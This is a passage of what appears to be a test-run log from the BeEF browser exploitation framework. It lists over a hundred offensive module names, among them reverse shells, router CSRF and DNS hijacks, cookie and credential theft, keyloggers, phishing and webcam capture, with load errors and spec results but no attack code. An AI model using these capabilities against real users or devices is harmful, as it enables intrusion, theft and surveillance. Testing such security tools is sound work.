'/command/shell_shock_scanner.js' -[12:25:37][>] Hard Load module: 'shell_shock_scanner' -[12:25:37][>] Server: mounted handler '/command/Wordpress_add_admin.js' -[12:25:37][>] Hard Load module: 'Wordpress_add_admin' -[12:25:37][>] Server: mounted handler '/command/apache_cookies.js' -[12:25:37][>] Hard Load module: 'apache_cookies' -[12:25:37][>] Server: mounted handler '/command/airlive_add_user_csrf.js' -[12:25:37][>] Hard Load module: 'airlive_add_user_csrf' -[12:25:37][>] Server: mounted handler '/command/linksys_wvc_wireless_camera_csrf.js' -[12:25:37][>] Hard Load module: 'linksys_wvc_wireless_camera_csrf' -[12:25:37][>] Server: mounted handler '/command/Dlink_dcs_series_csrf.js' -[12:25:37][>] Hard Load module: 'Dlink_dcs_series_csrf' -[12:25:37][>] Server: mounted handler '/command/firephp_code_exec.js' -[12:25:37][>] Hard Load module: 'firephp_code_exec' -[12:25:37][>] Server: mounted handler '/command/Shell_shocked.js' -[12:25:37][>] Hard Load module: 'Shell_shocked' -[12:25:37][>] Server: mounted handler '/command/Netgear_gs108t_csrf.js' -[12:25:37][>] Hard Load module: 'Netgear_gs108t_csrf' -[12:25:37][>] Server: mounted handler '/command/Dlink_dgs_1100_device_reset_csrf.js' -[12:25:37][>] Hard Load module: 'Dlink_dgs_1100_device_reset_csrf' -[12:25:37][>] Server: mounted handler '/command/Dlink_dgs_1100_fdb_whitelist_csrf.js' -[12:25:37][>] Hard Load module: 'Dlink_dgs_1100_fdb_whitelist_csrf' -[12:25:37][>] Server: mounted handler '/command/Dlink_dgs_1100_port_mirroring_csrf.js' -[12:25:37][>] Hard Load module: 'Dlink_dgs_1100_port_mirroring_csrf' -[12:25:37][>] Server: mounted handler '/command/groovyshell_server_command_execution.js' -[12:25:37][>] Hard Load module: 'groovyshell_server_command_execution' -[12:25:37][>] Server: mounted handler '/command/jboss_jmx_upload_exploit.js' -[12:25:37][>] Hard Load module: 'jboss_jmx_upload_exploit' -[12:25:37][>] Server: mounted handler '/command/skype_xss.js' -[12:25:37][>] Hard Load module: 'skype_xss' -[12:25:37][>] Server: mounted handler '/command/serendipity_1_6_xss.js' -[12:25:37][>] Hard Load module: 'serendipity_1_6_xss' -[12:25:37][>] Server: mounted handler '/command/sqlitemanager_xss.js' -[12:25:37][>] Hard Load module: 'sqlitemanager_xss' -[12:25:37][>] Server: mounted handler '/command/cisco_collaboration_server_5_xss.js' -[12:25:37][>] Hard Load module: 'cisco_collaboration_server_5_xss' -[12:25:37][>] Server: mounted handler '/command/alienvault_ossim_3_1_xss.js' -[12:25:37][>] Hard Load module: 'alienvault_ossim_3_1_xss' -[12:25:37][>] Server: mounted handler '/command/extract_cmd_exec.js' -[12:25:37][>] Hard Load module: 'extract_cmd_exec' -[12:25:37][>] Server: mounted handler '/command/monowall_reverse_root_shell_csrf.js' -[12:25:37][>] Hard Load module: 'monowall_reverse_root_shell_csrf' -[12:25:37][>] Server: mounted handler '/command/BeEF_bind_shell.js' -[12:25:37][>] Hard Load module: 'BeEF_bind_shell' -[12:25:37][>] Server: mounted handler '/command/Eudora_mail_beef_bind.js' -[12:25:37][>] Hard Load module: 'Eudora_mail_beef_bind' -[12:25:37][>] Server: mounted handler '/command/Active_fax_beef_bind.js' -[12:25:37][>] Hard Load module: 'Active_fax_beef_bind' -[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_admin_password.js' -[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_admin_password' -[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass.js' -[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass' -[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_migrate_hook.js' -[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_migrate_hook' -[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_file_disclosure.js' -[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_file_disclosure' -[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_admin_static_token.js' -[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_admin_static_token' -[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_scanner.js' -[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_scanner' -[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_admin_dynamic_token.js' -[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_admin_dynamic_token' -[12:25:37][>] Server: mounted handler '/command/zeroshell_2_0rc2_reverse_shell_csrf_sop.js' -[12:25:37][>] Hard Load module: 'zeroshell_2_0rc2_reverse_shell_csrf_sop' -[12:25:37][>] Server: mounted handler '/command/jenkins_groovy_code_exec.js' -[12:25:37][>] Hard Load module: 'jenkins_groovy_code_exec' -[12:25:37][>] Server: mounted handler '/command/zenoss_command_execution.js' -[12:25:37][>] Hard Load module: 'zenoss_command_execution' -[12:25:37][>] Server: mounted handler '/command/activex_command_execution.js' -[12:25:37][>] Hard Load module: 'activex_command_execution' -[12:25:37][>] Server: mounted handler '/command/ie_ms12_004_midi.js' -[12:25:37][>] Hard Load module: 'ie_ms12_004_midi' -[12:25:37][>] Server: mounted handler '/command/windows_mail_client_dos.js' -[12:25:37][>] Hard Load module: 'windows_mail_client_dos' -[12:25:37][>] Server: mounted handler '/command/java_payload.js' -[12:25:37][>] Hard Load module: 'java_payload' -[12:25:37][>] Server: mounted handler '/command/signed_applet_dropper.js' -[12:25:37][>] Hard Load module: 'signed_applet_dropper' -[12:25:37][>] Server: mounted handler '/command/ie_ms13_069_caret.js' -[12:25:37][>] Hard Load module: 'ie_ms13_069_caret' -[12:25:37][>] Server: mounted handler '/command/safari_launch_app.js' -[12:25:37][>] Hard Load module: 'safari_launch_app' -[12:25:37][>] Server: mounted handler '/command/ruby_nntpd_cmd_exec.js' -[12:25:37][>] Hard Load module: 'ruby_nntpd_cmd_exec' -[12:25:37][>] Server: mounted handler '/command/farsite_X25_remote_shell.js' -[12:25:37][>] Hard Load module: 'farsite_X25_remote_shell' -[12:25:37][>] Server: mounted handler '/command/php_dos.js' -[12:25:37][>] Hard Load module: 'php_dos' -[12:25:37][>] Server: mounted handler '/command/rfi_scanner.js' -[12:25:37][>] Hard Load module: 'rfi_scanner' -[12:25:37][>] Server: mounted handler '/command/resource_exhaustion_dos.js' -[12:25:37][>] Hard Load module: 'resource_exhaustion_dos' -[12:25:37][>] Server: mounted handler '/command/phonegap_check_connection.js' -[12:25:37][>] Hard Load module: 'phonegap_check_connection' -[12:25:37][>] Server: mounted handler '/command/phonegap_list_files.js' -[12:25:37][>] Hard Load module: 'phonegap_list_files' -[12:25:37][>] Server: mounted handler '/command/phonegap_start_record_audio.js' -[12:25:37][>] Hard Load module: 'phonegap_start_record_audio' -[12:25:37][>] Server: mounted handler '/command/phonegap_file_upload.js' -[12:25:37][>] Hard Load module: 'phonegap_file_upload' -[12:25:37][>] Server: mounted handler '/command/phonegap_prompt_user.js' -[12:25:37][>] Hard Load module: 'phonegap_prompt_user' -[12:25:37][>] Server: mounted handler '/command/phonegap_persist_resume.js' -[12:25:37][>] Hard Load module: 'phonegap_persist_resume' -[12:25:37][>] Server: mounted handler '/command/phonegap_globalization_status.js' -[12:25:37][>] Hard Load module: 'phonegap_globalization_status' -[12:25:37][>] Server: mounted handler '/command/phonegap_keychain.js' -[12:25:37][>] Hard Load module: 'phonegap_keychain' -[12:25:37][>] Server: mounted handler '/command/phonegap_list_contacts.js' -[12:25:37][>] Hard Load module: 'phonegap_list_contacts' -[12:25:37][>] Server: mounted handler '/command/phonegap_persistence.js' -[12:25:37][>] Hard Load module: 'phonegap_persistence' -[12:25:37][>] Server: mounted handler '/command/phonegap_alert_user.js' -[12:25:37][>] Hard Load module: 'phonegap_alert_user' -[12:25:37][>] Server: mounted handler '/command/phonegap_geo_locate.js' -[12:25:37][>] Hard Load module: 'phonegap_geo_locate' -[12:25:37][>] Server: mounted handler '/command/phonegap_plugin_detection.js' -[12:25:37][>] Hard Load module: 'phonegap_plugin_detection' -[12:25:37][>] Server: mounted handler '/command/phonegap_detect.js' -[12:25:37][>] Hard Load module: 'phonegap_detect' -[12:25:37][>] Server: mounted handler '/command/phonegap_stop_record_audio.js' -[12:25:37][>] Hard Load module: 'phonegap_stop_record_audio' -[12:25:37][>] Server: mounted handler '/command/phonegap_beep.js' -[12:25:37][>] Hard Load module: 'phonegap_beep' -[12:25:37][>] Server: mounted handler '/command/steal_autocomplete.js' -[12:25:37][>] Hard Load module: 'steal_autocomplete' -[12:25:37][>] Server: mounted handler '/command/text_to_voice.js' -[12:25:37][>] Hard Load module: 'text_to_voice' -[12:25:37][>] Server: mounted handler '/command/pretty_theft.js' -[12:25:37][>] Hard Load module: 'pretty_theft' -[12:25:37][>] Server: mounted handler '/command/gmail_phishing.js' -[12:25:37][>] Hard Load module: 'gmail_phishing' -[12:25:37][>] Server: mounted handler '/command/ui_abuse_ie.js' -[12:25:37][>] Hard Load module: 'ui_abuse_ie' -[12:25:37][>] Server: mounted handler '/command/fake_lastpass.js' -[12:25:37][>] Hard Load module: 'fake_lastpass' -[12:25:37][>] Server: mounted handler '/command/tabnabbing.js' -[12:25:37][>] Hard Load module: 'tabnabbing' -[12:25:37][>] Server: mounted handler '/command/sitekiosk_breakout.js' -[12:25:37][>] Hard Load module: 'sitekiosk_breakout' -[12:25:37][>] Server: mounted handler '/command/fake_notification_ie.js' -[12:25:37][>] Hard Load module: 'fake_notification_ie' -[12:25:37][>] Server: mounted handler '/command/replace_video_fake_plugin.js' -[12:25:37][>] Hard Load module: 'replace_video_fake_plugin' -[12:25:37][>] Server: mounted handler '/command/fake_notification.js' -[12:25:37][>] Hard Load module: 'fake_notification' -[12:25:37][>] Server: mounted handler '/command/clippy.js' -[12:25:37][>] Hard Load module: 'clippy' -[12:25:37][>] Server: mounted handler '/command/fake_evernote_clipper.js' -[12:25:37][>] Hard Load module: 'fake_evernote_clipper' -[12:25:37][>] Server: mounted handler '/command/firefox_extension_reverse_shell.js' -[12:25:37][>] Hard Load module: 'firefox_extension_reverse_shell' -[12:25:37][>] Server: mounted handler '/command/simple_hijacker.js' -[12:25:37][>] Hard Load module: 'simple_hijacker' -[12:25:37][>] Server: mounted handler '/command/hta_powershell.js' -[12:25:37][>] Hard Load module: 'hta_powershell' -[12:25:37][>] Server: mounted handler '/command/clickjacking.js' -[12:25:37][>] Hard Load module: 'clickjacking' -[12:25:37][>] Server: mounted handler '/command/spoof_addressbar_data.js' -[12:25:37][>] Hard Load module: 'spoof_addressbar_data' -[12:25:37][>] Server: mounted handler '/command/fake_notification_c.js' -[12:25:37][>] Hard Load module: 'fake_notification_c' -[12:25:37][>] Server: mounted handler '/command/lcamtuf_download.js' -[12:25:37][>] Hard Load module: 'lcamtuf_download' -[12:25:37][>] Server: mounted handler '/command/edge_wscript_wsh_injection.js' -[12:25:37][>] Hard Load module: 'edge_wscript_wsh_injection' -[12:25:37][>] Server: mounted handler '/command/firefox_extension_dropper.js' -[12:25:37][>] Hard Load module: 'firefox_extension_dropper' -[12:25:37][>] Server: mounted handler '/command/firefox_extension_bindshell.js' -[12:25:37][>] Hard Load module: 'firefox_extension_bindshell' -[12:25:37][>] Server: mounted handler '/command/fake_notification_ff.js' -[12:25:37][>] Hard Load module: 'fake_notification_ff' -[12:25:37][>] Server: mounted handler '/command/fake_flash_update.js' -[12:25:37][>] Hard Load module: 'fake_flash_update' -[12:25:37][>] Server: mounted handler '/command/cross_site_printing.js' -[12:25:37][>] Hard Load module: 'cross_site_printing' -[12:25:37][>] Server: mounted handler '/command/cross_site_faxing.js' -[12:25:37][>] Hard Load module: 'cross_site_faxing' -[12:25:37][>] Server: mounted handler '/command/inter_protocol_win_bindshell.js' -[12:25:37][>] Hard Load module: 'inter_protocol_win_bindshell' -[12:25:37][>] Server: mounted handler '/command/etag_client.js' -[12:25:37][>] Hard Load module: 'etag_client' -[12:25:37][>] Server: mounted handler '/command/s2c_dns_tunnel.js' -[12:25:37][>] Hard Load module: 's2c_dns_tunnel' -[12:25:37][>] Server: mounted handler '/command/inter_protocol_imap.js' -[12:25:37][>] Hard Load module: 'inter_protocol_imap' -[12:25:37][>] Server: mounted handler '/command/inter_protocol_redis.js' -[12:25:37][>] Hard Load module: 'inter_protocol_redis' -[12:25:37][>] Server: mounted handler '/command/inter_protocol_posix_bindshell.js' -[12:25:37][>] Hard Load module: 'inter_protocol_posix_bindshell' -[12:25:37][>] Server: mounted handler '/command/inter_protocol_irc.js' -[12:25:37][>] Hard Load module: 'inter_protocol_irc' -[12:25:37][>] Server: mounted handler '/command/send_inotes.js' -[12:25:37][>] Hard Load module: 'send_inotes' -[12:25:37][>] Server: mounted handler '/command/extract_inotes_list.js' -[12:25:37][>] Hard Load module: 'extract_inotes_list' -[12:25:37][>] Server: mounted handler '/command/send_inotes_with_attachment.js' -[12:25:37][>] Hard Load module: 'send_inotes_with_attachment' -[12:25:37][>] Server: mounted handler '/command/read_inotes.js' -[12:25:37][>] Hard Load module: 'read_inotes' -[12:25:37][>] Server: mounted handler '/command/inotes_flooder.js' -[12:25:37][>] Hard Load module: 'inotes_flooder' -[12:25:37][>] Server: mounted handler '/command/read_gmail.js' -[12:25:37][>] Hard Load module: 'read_gmail' -[12:25:37][>] Server: mounted handler '/command/invisible_iframe.js' -[12:25:37][>] Hard Load module: 'invisible_iframe' -[12:25:37][>] Server: mounted handler '/command/local_file_theft.js' -[12:25:37][>] Hard Load module: 'local_file_theft' -[12:25:37][>] Server: mounted handler '/command/iframe_keylogger.js' -[12:25:37][>] Hard Load module: 'iframe_keylogger' -[12:25:37][>] Server: mounted handler '/command/wordpress_current_user_info.js' -[12:25:37][>] Hard Load module: 'wordpress_current_user_info' -[12:25:37][>] Server: mounted handler '/command/wordpress_add_user.js' -[12:25:37][>] Hard Load module: 'wordpress_add_user' -[12:25:37][>] Server: mounted handler '/command/wordpress_upload_rce_plugin.js' -[12:25:37][>] Hard Load module: 'wordpress_upload_rce_plugin' -[12:25:37][>] Server: mounted handler '/command/wordpress_post_auth_rce.js' -[12:25:37][>] Hard Load module: 'wordpress_post_auth_rce' -[12:25:37][>] Server: mounted handler '/command/unblockui.js' -[12:25:37][>] Hard Load module: 'unblockui' -[12:25:37][>] Server: mounted handler '/command/iframe_sniffer.js' -[12:25:37][>] Hard Load module: 'iframe_sniffer' -[12:25:37][>] Server: mounted handler '/command/raw_javascript.js' -[12:25:37][>] Hard Load module: 'raw_javascript' -[12:25:37][>] Server: mounted handler '/command/blockui.js' -[12:25:37][>] Hard Load module: 'blockui' -[12:25:37][>] Server: mounted handler '/command/no_sleep.js' -[12:25:37][>] Hard Load module: 'no_sleep' -[12:25:37][>] Server: mounted handler '/command/cryptoloot_miner.js' -[12:25:37][>] Hard Load module: 'cryptoloot_miner' -[12:25:37][>] Server: mounted handler '/command/track_physical_movement.js' -[12:25:37][>] Hard Load module: 'track_physical_movement' -[12:25:37][>] Server: mounted handler '/command/detect_airdroid.js' -[12:25:37][>] Hard Load module: 'detect_airdroid' -[12:25:37][>] Server: mounted handler '/command/get_registry_keys.js' -[12:25:37][>] Hard Load module: 'get_registry_keys' -[12:25:37][>] Server: mounted handler '/command/iphone_tel.js' -[12:25:37][>] Hard Load module: 'iphone_tel' -[12:25:37][>] Server: mounted handler '/command/detect_protocol_handlers.js' -[12:25:37][>] Hard Load module: 'detect_protocol_handlers' -[12:25:37][>] Server: mounted handler '/command/physical_location_thirdparty.js' -[12:25:37][>] Hard Load module: 'physical_location_thirdparty' -[12:25:37][>] Server: mounted handler '/command/detect_coupon_printer.js' -[12:25:37][>] Hard Load module: 'detect_coupon_printer' -[12:25:37][>] Server: mounted handler '/command/hook_microsoft_edge.js' -[12:25:37][>] Hard Load module: 'hook_microsoft_edge' -[12:25:37][>] Server: mounted handler '/command/detect_hp.js' -[12:25:37][>] Hard Load module: 'detect_hp' -[12:25:37][>] Server: mounted handler '/command/detect_local_drives.js' -[12:25:37][>] Hard Load module: 'detect_local_drives' -[12:25:37][>] Server: mounted handler '/command/get_battery_status.js' -[12:25:37][>] Hard Load module: 'get_battery_status' -[12:25:37][>] Server: mounted handler '/command/detect_cups.js' -[12:25:37][>] Hard Load module: 'detect_cups' -[12:25:37][>] Server: mounted handler '/command/get_system_info_java.js' -[12:25:37][>] Hard Load module: 'get_system_info_java' -[12:25:37][>] Server: mounted handler '/command/get_internal_ip_java.js' -[12:25:37][>] Hard Load module: 'get_internal_ip_java' -[12:25:37][>] Server: mounted handler '/command/detect_antivirus.js' -[12:25:37][>] Hard Load module: 'detect_antivirus' -[12:25:37][>] Server: mounted handler '/command/clipboard_theft.js' -[12:25:37][>] Hard Load module: 'clipboard_theft' -[12:25:37][>] Server: mounted handler '/command/physical_location.js' -[12:25:37][>] Hard Load module: 'physical_location' -[12:25:37][>] Server: mounted handler '/command/detect_google_desktop.js' -[12:25:37][>] Hard Load module: 'detect_google_desktop' -[12:25:37][>] Server: mounted handler '/command/detect_default_browser.js' -[12:25:37][>] Hard Load module: 'detect_default_browser' -[12:25:37][>] Server: mounted handler '/command/get_internal_ip_webrtc.js' -[12:25:37][>] Hard Load module: 'get_internal_ip_webrtc' -[12:25:37][>] Server: mounted handler '/command/get_connection_type.js' -[12:25:37][>] Hard Load module: 'get_connection_type' -[12:25:37][>] Server: mounted handler '/command/detect_users.js' -[12:25:37][>] Hard Load module: 'detect_users' -[12:25:37][>] Server: mounted handler '/command/detect_software.js' -[12:25:37][>] Hard Load module: 'detect_software' -[12:25:37][>] Server: mounted handler '/command/get_wireless_keys.js' -[12:25:37][>] Hard Load module: 'get_wireless_keys' -[12:25:37][>] Server: mounted handler '/command/hook_default_browser.js' -[12:25:37][>] Hard Load module: 'hook_default_browser' -[12:25:37][>] Server: mounted handler '/command/popunder_window.js' -[12:25:37][>] Hard Load module: 'popunder_window' -[12:25:37][>] Server: mounted handler '/command/popunder_window_ie.js' -[12:25:37][>] Hard Load module: 'popunder_window_ie' -[12:25:37][>] Server: mounted handler '/command/iframe_above.js' -[12:25:37][>] Hard Load module: 'iframe_above' -[12:25:37][>] Server: mounted handler '/command/hijack_opener.js' -[12:25:37][>] Hard Load module: 'hijack_opener' -[12:25:37][>] Server: mounted handler '/command/invisible_htmlfile_activex.js' -[12:25:37][>] Hard Load module: 'invisible_htmlfile_activex' -[12:25:37][>] Server: mounted handler '/command/confirm_close_tab.js' -[12:25:37][>] Hard Load module: 'confirm_close_tab' -[12:25:37][>] Server: mounted handler '/command/man_in_the_browser.js' -[12:25:37][>] Hard Load module: 'man_in_the_browser' -[12:25:37][>] Server: mounted handler '/command/jsonp_service_worker.js' -[12:25:37][>] Hard Load module: 'jsonp_service_worker' -[12:25:37][>] Server: mounted handler '/command/send_gvoice_sms.js' -[12:25:37][>] Hard Load module: 'send_gvoice_sms' -[12:25:37][>] Server: mounted handler '/command/get_all_cookies.js' -[12:25:37][>] Hard Load module: 'get_all_cookies' -[12:25:37][>] Server: mounted handler '/command/execute_tabs.js' -[12:25:37][>] Hard Load module: 'execute_tabs' -[12:25:37][>] Server: mounted handler '/command/grab_google_contacts.js' -[12:25:37][>] Hard Load module: 'grab_google_contacts' -[12:25:37][>] Server: mounted handler '/command/inject_beef.js' -[12:25:37][>] Hard Load module: 'inject_beef' -[12:25:37][>] Server: mounted handler '/command/screenshot.js' -[12:25:37][>] Hard Load module: 'screenshot' - loaded successfully - -BeEF Security Checks - dangerous eval usage - -BeEF Extension Requester - requester works (PENDING: Temporarily skipped with xit) - loads configuration - has interface - -BeEF Extension IPEC - interface - loads configuration - -BeEF Dynamic Reconsturction - delete - put - head - get -[12:25:38][>] Network stack could not decode packet stream. -[12:25:38][>] Dumping Stream Data [base64]: 1 -[12:25:38][>] Dumping Stream Data: - one values -[12:25:38][!] Hooked browser returned an invalid argument: can't convert Array into Integer - array values - zero values - no params - negative one values -[12:25:38][!] Hooked browser returned an invalid argument: invalid value for Integer(): "z" - ascii values - -BeEF Extension Proxy - loads configuration - -BeEF Debug Command Modules: -[12:25:38][>] Loaded extension: 'network' -[12:25:38][>] Loaded extension: 'social_engineering' -[12:25:38][>] Loaded extension: 'admin_ui' -[12:25:38][>] Loaded extension: 'events' -[12:25:39][>] Loaded extension: 'requester' -[12:25:39][>] Loaded extension: 'proxy' -[12:25:39][>] Loaded extension: 'xssrays' -[12:25:39][>] Loaded extension: 'demos' -[12:25:44][!] Unable to load module 'internal_network_fingerprinting' -[12:25:44][!] Unable to load module 'detect_burp' -[12:25:44][!] Unable to load module 'get_http_servers' -[12:25:44][!] Unable to load module 'detect_tor' -[12:25:44][!] Unable to load module 'irc_nat_pinning' -[12:25:44][!] Unable to load module 'get_ntop_network_hosts' -[12:25:44][!] Unable to load module 'doser' -[12:25:44][!] Unable to load module 'detect_soc_nets' -[12:25:44][!] Unable to load module 'ping_sweep_ff' -[12:25:44][!] Unable to load module 'cross_origin_scanner_cors' -[12:25:44][!] Unable to load module 'dns_enumeration' -[12:25:44][!] Unable to load module 'cross_origin_scanner_flash' -[12:25:44][!] Unable to load module 'get_proxy_servers_wpad' -[12:25:44][!] Unable to load module 'port_scanner' -[12:25:44][!] Unable to load module 'fingerprint_routers' -[12:25:44][!] Unable to load module 'ping_sweep' -[12:25:44][!] Unable to load module 'f5_bigip_cookie_stealing' -[12:25:44][!] Unable to load module 'f5_bigip_cookie_disclosure' -[12:25:44][!] Unable to load module 'sw_port_scanner' -[12:25:44][!] Unable to load module 'ping_sweep_java' -[12:25:44][!] Unable to load module 'identify_lan_subnets' -[12:25:44][!] Unable to load module 'dns_rebinding' -[12:25:44][!] Unable to load module 'test_return_image' -[12:25:44][!] Unable to load module 'test_network_request' -[12:25:44][!] Unable to load module 'test_http_redirect' -[12:25:44][!] Unable to load module 'test_return_ascii_chars' -[12:25:44][!] Unable to load module 'test_dns_tunnel_client' -[12:25:44][!] Unable to load module 'test_beef_debug' -[12:25:44][!] Unable to load module 'test_get_variable' -[12:25:44][!] Unable to load module 'test_return_long_string' -[12:25:44][!] Unable to load module 'test_cors_request' -[12:25:44][!] Unable to load module 'Detect_unity' -[12:25:44][!] Unable to load module 'detect_office' -[12:25:44][!] Unable to load module 'unhook' -[12:25:44][!] Unable to load module 'avant_steal_history' -[12:25:44][!] Unable to load module 'detect_wmp' -[12:25:44][!] Unable to load module 'detect_vlc' -[12:25:44][!] Unable to load module 'browser_fingerprinting' -[12:25:44][!] Unable to load module 'webcam' -[12:25:44][!] Unable to load module 'get_visited_domains' -[12:25:44][!] Unable to load module 'detect_foxit' -[12:25:44][!] Unable to load module 'Detect_toolbars' -[12:25:44][!] Unable to load module 'detect_realplayer' -[12:25:44][!] Unable to load module 'detect_quicktime' -[12:25:44][!] Unable to load module 'get_visited_urls' -[12:25:44][!] Unable to load module 'fingerprint_browser' -[12:25:44][!] Unable to load module 'remove_hook_element' -[12:25:44][!] Unable to load module 'detect_lastpass' -[12:25:44][!] Unable to load module 'detect_simple_adblock' -[12:25:44][!] Unable to load module 'webcam_html5' -[12:25:44][!] Unable to load module 'get_page_html_iframe' -[12:25:44][!] Unable to load module 'link_rewrite_sslstrip' -[12:25:44][!] Unable to load module 'rickroll' -[12:25:44][!] Unable to load module 'link_rewrite_click_events' -[12:25:44][!] Unable to load module 'prompt_dialog' -[12:25:44][!] Unable to load module 'get_form_values' -[12:25:44][!] Unable to load module 'ajax_fingerprint' -[12:25:44][!] Unable to load module 'deface_web_page_component' -[12:25:44][!] Unable to load module 'mobilesafari_address_spoofing' -[12:25:44][!] Unable to load module 'deface_web_page' -[12:25:44][!] Unable to load module 'link_rewrite' -[12:25:44][!] Unable to load module 'get_stored_credentials' -[12:25:44][!] Unable to load module 'link_rewrite_tel' -[12:25:44][!] Unable to load module 'remove_stuck_iframes' -[12:25:44][!] Unable to load module 'get_cookie' -[12:25:44][!] Unable to load module 'clear_console' -[12:25:44][!] Unable to load module 'alert_dialog' -[12:25:44][!] Unable to load module 'site_redirect' -[12:25:44][!] Unable to load module 'site_redirect_iframe' -[12:25:44][!] Unable to load module 'get_local_storage' -[12:25:44][!] Unable to load module 'replace_video' -[12:25:44][!] Unable to load module 'overflow_cookiejar' -[12:25:44][!] Unable to load module 'get_page_html' -[12:25:44][!] Unable to load module 'get_page_links' -[12:25:44][!] Unable to load module 'get_session_storage' -[12:25:44][!] Unable to load module 'disable_developer_tools' -[12:25:44][!] Unable to load module 'detect_silverlight' -[12:25:44][!] Unable to load module 'detect_mime_types' -[12:25:44][!] Unable to load module 'webcam_permission_check' -[12:25:44][!] Unable to load module 'detect_extensions' -[12:25:44][!] Unable to load module 'detect_unsafe_activex' -[12:25:44][!] Unable to load module 'detect_activex' -[12:25:44][!] Unable to load module 'spyder_eye' -[12:25:44][!] Unable to load module 'Play_sound' -[12:25:44][!] Unable to load module 'detect_popup_blocker' -[12:25:44][!] Unable to load module 'detect_evernote_clipper' -[12:25:44][!] Unable to load module 'detect_firebug' -[12:25:44][!] Unable to load module 'vtiger_crm_upload_exploit' -[12:25:44][!] Unable to load module 'coldfusion_dir_traversal_exploit' -[12:25:44][!] Unable to load module 'pfsense_2_3_2_reverse_root_shell_csrf' -[12:25:44][!] Unable to load module 'pfsense_reverse_root_shell_csrf' -[12:25:44][!] Unable to load module 'qnx_qconn_command_execution' -[12:25:44][!] Unable to load module 'wanem_command_execution' -[12:25:44][!] Unable to load module 'kemp_command_execution' -[12:25:44][!] Unable to load module 'apache_felix_remote_shell' -[12:25:44][!] Unable to load module 'opencart_reset_password' -[12:25:44][!] Unable to load module 'spring_framework_malicious_jar' -[12:25:44][!] Unable to load module 'wipg1000_cmd_injection' -[12:25:44][!] Unable to load module 'planet_vdr300nu_adsl_dns_hijack' -[12:25:44][!] Unable to load module 'utstarcom_wa3002g4_dns_hijack' -[12:25:44][!] Unable to load module 'linksys_befsr41_csrf' -[12:25:44][!] Unable to load module 'Huawei_smartax_mt880_csrf' -[12:25:44][!] Unable to load module 'dlink_dsl2740r_dns_hijack' -[12:25:44][!] Unable to load module 'telstra_zte_mf91_disable_ap_isolation' -[12:25:44][!] Unable to load module 'dlink_dir_615_csrf' -[12:25:44][!] Unable to load module 'exper_ewm01_adsl_dns_hijack' -[12:25:44][!] Unable to load module 'comtrend_ct_series_dns_hijack' -[12:25:44][!] Unable to load module 'ddwrt_v24_sp1_cmd_exec' -[12:25:44][!] Unable to load module 'dlink_2640b_dns_hijack' -[12:25:44][!] Unable to load module 'dlink_dsl526b_dns_hijack' -[12:25:44][!] Unable to load module 'dlink_dsl500t_csrf' -[12:25:44][!] Unable to load module 'asus_dslx11_dns_hijack' -[12:25:44][!] Unable to load module 'shuttle_tech_915wm_dns_hijack' -[12:25:44][!] Unable to load module 'philips_dns_hijack' -[12:25:44][!] Unable to load module 'cisco_e2400_csrf' -[12:25:44][!] Unable to load module 'comtrend_ct5367_csrf' -[12:25:44][!] Unable to load module 'argw4_adsl_dns_hijack' -[12:25:44][!] Unable to load module 'pikatel_96338_dns_hijack' -[12:25:44][!] Unable to load module 'iball_baton_ib_wra150n_dns_hijack' -[12:25:44][!] Unable to load module 'dlink_dsl2780b_dns_hijack' -[12:25:44][!] Unable to load module 'inteno_eg101r1_voip_dns_hijack' -[12:25:44][!] Unable to load module 'linksys_e2500_csrf' -[12:25:44][!] Unable to load module 'actiontec_q1000_csrf' -[12:25:44][!] Unable to load module 'com_officeconnect_cmd_exec' -[12:25:44][!] Unable to load module 'linksys_e2500_dns_hijack' -[12:25:44][!] Unable to load module 'asmax_ar804gu_cmd_exec' -[12:25:44][!] Unable to load module 'virgin_superhub_csrf' -[12:25:44][!] Unable to load module 'bt_home_hub_csrf' -[12:25:44][!] Unable to load module 'linksys_e2500_shell' -[12:25:44][!] Unable to load module 'beetel_bcm96338_router_dns_hijack' -[12:25:44][!] Unable to load module 'Netgear_dgn_2000_wan_mgmt_csrf' -[12:25:44][!] Unable to load module 'netgear_dgn2200_cmd_exec' -[12:25:44][!] Unable to load module 'tplink_dns_csrf' -[12:25:44][!] Unable to load module 'asus_rt_n66u_cmd_exec' -[12:25:44][!] Unable to load module 'ddwrt_v24_sp1_csrf' -[12:25:44][!] Unable to load module 'linksys_wrt54g2_csrf' -[12:25:44][!] Unable to load module 'telstra_zte_mf91_change_ssid' -[12:25:44][!] Unable to load module 'telstra_zte_mf91_change_pw' -[12:25:44][!] Unable to load module 'asus_rt_n12e_get_info' -[12:25:44][!] Unable to load module 'linksys_wrt54g_csrf' -[12:25:44][!] Unable to load module 'tenda_adsl_dns_hijack' -[12:25:44][!] Unable to load module 'belkin_dns_csrf' -[12:25:44][!] Unable to load module 'comtrend_ct5624_csrf' -[12:25:44][!] Unable to load module 'dlink_dsl2640u_dns_hijack' -[12:25:44][!] Unable to load module 'freenas_reverse_root_shell_csrf' -[12:25:44][!] Unable to load module 'dlink_sharecenter_cmd_exec' -[12:25:44][!] Unable to load module 'boastmachine_add_user_csrf' -[12:25:44][!] Unable to load module 'zenoss_add_user_csrf' -[12:25:44][!] Unable to load module 'hp_ucmdb_add_user_csrf' -[12:25:44][!] Unable to load module 'glassfish_war_upload_xsrf' -[12:25:44][!] Unable to load module 'ntfscommoncreate_dos' -[12:25:44][!] Unable to load module 'shell_shock_scanner' -[12:25:44][!] Unable to load module 'Wordpress_add_admin' -[12:25:44][!] Unable to load module 'apache_cookies' -[12:25:44][!] Unable to load module 'airlive_add_user_csrf' -[12:25:44][!] Unable to load module 'linksys_wvc_wireless_camera_csrf' -[12:25:44][!] Unable to load module 'Dlink_dcs_series_csrf' -[12:25:44][!] Unable to load module 'firephp_code_exec' -[12:25:44][!] Unable to load module 'Shell_shocked' 